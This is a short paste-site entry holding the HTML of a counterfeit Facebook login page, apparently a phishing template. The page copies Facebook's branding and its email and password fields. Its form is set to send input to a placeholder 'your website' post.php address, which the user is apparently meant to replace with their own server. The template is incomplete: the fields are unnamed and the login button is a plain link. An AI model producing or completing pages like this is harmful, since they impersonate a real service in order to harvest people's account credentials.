Untitled
3 years ago in Plain Text
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" name="viewport" content="width=device-width, initial-scale=1">
<title>Facebook</title>
<link rel="stylesheet" href="Facebook login page css.css">
</head>
<body>
<div class="container">
<div class="left">
<h1>facebook</h1>
</div>
<div class="right">
<form action="http://yourwebsiteforyourpostphpuplod/post.php">
<input type="text" placeholder="Email addess or phone number" required>
<input type="password" placeholder="Password" required>
<a href="Telecom.html" class="loginBtn">Log In</a>
<a href="" class="forget">Forgotten password?</a>
<div class="sign-up">
<a href="" class="signupBtn">Create New Account</a>
</div>
</form>
<p><b>Create a Page</b> for a celebrity, band or business.</p>
</div>
</div>
</body>
</html>